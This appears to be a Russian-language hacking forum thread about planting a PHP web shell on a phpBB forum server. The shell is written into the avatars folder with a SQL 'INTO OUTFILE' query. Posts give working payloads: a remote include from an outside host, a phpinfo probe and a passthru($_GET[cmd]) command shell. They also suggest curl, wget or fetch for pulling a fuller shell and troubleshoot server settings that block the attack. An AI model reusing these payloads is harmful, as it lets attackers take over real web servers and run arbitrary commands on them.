![]() |
Проблемы при заливке шелла
Заливаю шелл через востановление базы в phpbb
Код:
SELECT '<? @include("http://host.narod.ru/files.txt"); ?>' FROM nuke_users LIMIT 1 INTO OUTFILE 'C:/bla/bla-bla/Forums/images/avatars/shell.php';http://host/Forums/images/avatars/shell.php - выбрасывает пустую страницу =( "?" - в конце не помогает. Из-за чего такое может быть? |
в папке куда ты залил шел находится конфигурационный файл Апача...
с параметрами: "первый нах"(шутка, но только про имя параметра...) |
прав не хватает, что бы через бд файл заливать
|
Цитата:
|
если открывается пшп файл, то это уже есть гуд. скорей всего инклуд извне запрещен, так что пробни вначале
Код:
SELECT '<? phpinfo() ?>' FROM nuke_users LIMIT 1 INTO OUTFILE 'C:/bla/bla-bla/Forums/images/avatars/shell.php';Код:
<? passthru($_GET[cmd]); ?>зы. а далее ищи качалки и заливай норм шелл (which curl;which wget;which fetch;which lynx etc ) |
Возможно просто отключена возможность подключения удаленных файлов через include().
Создай файл с кодом PHP код:
|
попробуй
Код:
SELECT '<? @include("http://host.narod.ru/files.txt"); ?>' FROM nuke_users LIMIT 1 INTO OUTFILE '/bla/bla-bla/Forums/images/avatars/shell.php'; |
Такс phpinfo - катит
allow_url_fopen - on. Все, теперь просто cmd - сделаю, но интересно почему - инклуд шелла не прокатил =( Хотя все ясно allow_url_include - Off Чем можно заменить include? кажется можно curl, но как? |
Кстати
Код:
<? passthru($_GET[cmd]); ?> |
Может быть safe_mode = on, тогда не команды не выполняются.
|
| Время: 05:02 |